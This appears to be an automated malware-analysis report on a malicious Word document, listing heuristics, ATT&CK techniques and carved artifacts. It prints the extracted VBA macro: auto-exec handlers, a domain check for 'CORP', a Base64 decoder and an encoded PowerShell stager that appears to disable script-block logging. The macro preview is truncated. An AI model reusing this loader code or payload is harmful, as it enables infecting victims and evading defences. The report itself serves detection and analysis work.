MALICIOUS
310
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing obfuscated VBA macros designed to execute automatically upon opening. Critical heuristics indicate an auto-exec loader that decodes and executes a payload. The VBA code attempts to decode a Base64 string, which is likely a second-stage payload, and execute it using GetObject and Shell functions.
Heuristics 10
-
VBA macros detected medium 7 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10239 bytes |
SHA-256: d797116934793c34c50d8379aef43f112a46c3293d9bc15d564a41ab284e17b8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub Auto_Open()
SetRSI
End Sub
Sub AutoOpen()
SetRSI
End Sub
Sub Document_Open()
SetRSI
End Sub
'
' 1)
'
Public Function computeAndSearch(ByVal base64String)
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin
base64String = Replace(base64String, vbCrLf, "")
base64String = Replace(base64String, vbTab, "")
base64String = Replace(base64String, " ", "")
dataLength = Len(base64String)
If dataLength Mod 4 <> 0 Then
Err.Raise 1, "computeAndSearch", "Bad Base64 string."
Exit Function
End If
For groupBegin = 1 To dataLength Step 4
Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
numDataBytes = 3
nGroup = 0
For CharCounter = 0 To 3
thisChar = Mid(base64String, groupBegin + CharCounter, 1)
If thisChar = "=" Then
numDataBytes = numDataBytes - 1
thisData = 0
Else
thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
End If
If thisData = -1 Then
Err.Raise 2, "computeAndSearch", "Bad character In Base64 string."
Exit Function
End If
nGroup = 64 * nGroup + thisData
Next
nGroup = Hex(nGroup)
nGroup = String(6 - Len(nGroup), "0") & nGroup
pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 5, 2)))
sOut = sOut & Left(pOut, numDataBytes)
Next
computeAndSearch = sOut
End Function
Public Function SetRSI() As Variant
Dim formula As String
If (StrComp(Environ("USERDOMAIN"), "CORP", vbTextCompare) = 0) Then
getKPI
Else
Exit Function
End If
End Function
Public Function getKPI() As Variant
Dim formula As String
'
' 2)
'
formula = computeAndSearch("cG93ZXJzaGVsbCAtbm9QIC1zdGEgLXcgMSAtZW5jICBTUUJHQUNnQUpBQlFBRk1BVmc=")
'
' 3)
'
formula = formula + "BlAFIAcwBpAE8AbgBUAEEAYgBsAGUALgBQAFMAVgBFAFIAcwBp"
formula = formula + "AG8AbgAuAE0AQQBqAG8AcgAgAC0ARwBlACAAMwApAHsAJABHAF"
formula = formula + "AARgA9AFsAcgBlAEYAXQAuAEEAcwBzAEUATQBCAGwAeQAuAEcA"
formula = formula + "ZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQ"
formula = formula + "BnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBV"
formula = formula + "AHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAEkARQBgAEwARAAiAC"
formula = formula + "gAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkA"
formula = formula + "UwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQ"
formula = formula + "BiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJABH"
formula = formula + "AFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAGUAdABWAG"
formula = formula + "EAbAB1AGUAKAAkAG4AVQBsAEwAKQA7AEkAZgAoACQARwBQAEMA"
formula = formula + "WwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZw"
formula = formula + "BnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBw"
formula = formula + "AHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAF"
formula = formula + "sAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwA"
formula = formula + "bwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQw"
formula = formula + "BbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBn"
formula = formula + "AGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAH"
formula = formula + "AAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8A"
formula = formula + "ZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAYQBsAD0AWwBDAE8ATA"
formula = formula + "BsAGUAQwBUAEkAbwBuAFMALgBHAGUATgBlAFIASQBDAC4ARABp"
formula = formula + "AGMAVABJAE8AbgBBAHIAeQBbAFMAdABSAEkAbgBnACwAUwBZAH"
formula = formula + "MA
... (truncated)
|
|||
ole10native_00.bin |
ole-package | OLE Ole10Native stream: ObjectPool/_1567263903/Ole10Native | 3844 bytes |
SHA-256: c10c370c13d22d7ac75e5c06e9297bb5dde4cf9b621ddd09ed082252cd84d4ce |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.